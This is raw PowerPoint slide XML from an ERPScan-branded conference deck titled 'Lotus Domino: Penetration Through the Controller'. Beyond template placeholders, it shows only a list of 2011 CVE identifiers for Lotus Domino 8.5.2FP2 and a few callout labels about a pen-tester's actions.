            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2500" dirty="0" smtClean="0"/>
              <a:t>Текст</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2500" dirty="0" smtClean="0"/>
              <a:t>Текст</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="428596" y="5000636"/>
            <a:ext cx="8286808" cy="1000132"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">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pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="3500" i="1" dirty="0" smtClean="0"/>
              <a:t>Вопрос, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3500" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>слоган</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3500" i="1" dirty="0" smtClean="0"/>
              <a:t>, утверждение</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r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>erpscan.com</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Нижний колонтитул 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:body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5" name="Номер слайда 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9D14D31A-0894-48B8-B9F2-A55D69D049F7}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="214282" y="2357430"/>
            <a:ext cx="8715436" cy="2143140"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">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a:r>
              <a:rPr lang="ru-RU" sz="3600" i="1" dirty="0" smtClean="0"/>
              <a:t>Идея</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3600" i="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t> слайда, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3600" i="1" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>слоган</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3600" i="1"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r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>erpscan.com</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Нижний колонтитул 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:body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5" name="Номер слайда 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9D14D31A-0894-48B8-B9F2-A55D69D049F7}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="214282" y="1142984"/>
            <a:ext cx="8715436" cy="5072098"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="3175" lvl="0" indent="-3175" algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Образец текста</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="3175" lvl="1" indent="-3175" algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Второй уровень</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="3175" lvl="2" indent="-3175" algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Третий уровень</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="3175" lvl="3" indent="-3175" algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Четвертый уровень</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="3175" lvl="4" indent="-3175" algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Пятый уровень</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1950613" y="1332000"/>
            <a:ext cx="5242774" cy="3673944"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 3933"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="F4740A"/>
            </a:solid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r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>erpscan.com</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Нижний колонтитул 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>ERPScan — invest in security to secure investments</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Номер слайда 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9D14D31A-0894-48B8-B9F2-A55D69D049F7}"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r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>erpscan.com</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Нижний колонтитул 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:body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6" name="Номер слайда 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9D14D31A-0894-48B8-B9F2-A55D69D049F7}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>erpscan.com</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Нижний колонтитул 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>ERPScan — invest in security to secure investments</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Номер слайда 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9D14D31A-0894-48B8-B9F2-A55D69D049F7}"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r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>erpscan.com</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Номер слайда 26"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9D14D31A-0894-48B8-B9F2-A55D69D049F7}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Нижний колонтитул 27"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>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r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>erpscan.com</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Нижний колонтитул 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="612648"/>
            <a:ext cx="1325880" cy="457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:body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5" name="Номер слайда 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8174736" y="2272"/>
            <a:ext cx="762000" cy="365760"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9D14D31A-0894-48B8-B9F2-A55D69D049F7}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>erpscan.com</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Нижний колонтитул 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:body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4" name="Номер слайда 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9D14D31A-0894-48B8-B9F2-A55D69D049F7}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>erpscan.com</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Нижний колонтитул 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:body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7" name="Номер слайда 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9D14D31A-0894-48B8-B9F2-A55D69D049F7}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>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r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>erpscan.com</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Нижний колонтитул 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:body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7" name="Номер слайда 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9D14D31A-0894-48B8-B9F2-A55D69D049F7}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>erpscan.com</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>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US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ERPScan — invest in security to secure investments</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>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D14D31A-0894-48B8-B9F2-A55D69D049F7}"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676" r:id="rId13"/>
    <p:sldLayoutId id="2147483661" r:id="rId14"/>
    <p:sldLayoutId id="2147483662" r:id="rId15"/>
    <p:sldLayoutId id="2147483663" r:id="rId16"/>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gif"/><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hyperlink" Target="mailto:dookie@inbox.ru" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:a.sintsov@dsecr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268760"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lotus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Domino: Penetration </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hrough the Controller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>Alexey </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Sintsov</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU"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116632"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lotus Domino 8.5.2FP2</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Объект 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107504" y="1192120"/>
            <a:ext cx="8229600" cy="4325112"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>CVE-2011-091</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>CVE-2011-0915</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>CVE-2011-0916</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>CVE-2011-0917</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>CVE-2011-0919</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>CVE-2011-0920</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Номер слайда 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9D14D31A-0894-48B8-B9F2-A55D69D049F7}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Скругленный прямоугольник 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6012160" y="2420888"/>
            <a:ext cx="2736304" cy="1296144"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="3492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Search for an exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6294709" y="2060848"/>
            <a:ext cx="2021707"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Pen-tester’s actions</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>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5536" y="3933056"/>
            <a:ext cx="8640960" cy="2304256"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8653"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="F4740A"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Выноска 1 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4499992" y="1052736"/>
            <a:ext cx="1296144" cy="777198"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 43077"/>
              <a:gd name="adj2" fmla="val -3161"/>
              <a:gd name="adj3" fmla="val 461357"/>
              <a:gd name="adj4" fmla="val -80468"/>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Useless</a:t>
            </a:r>
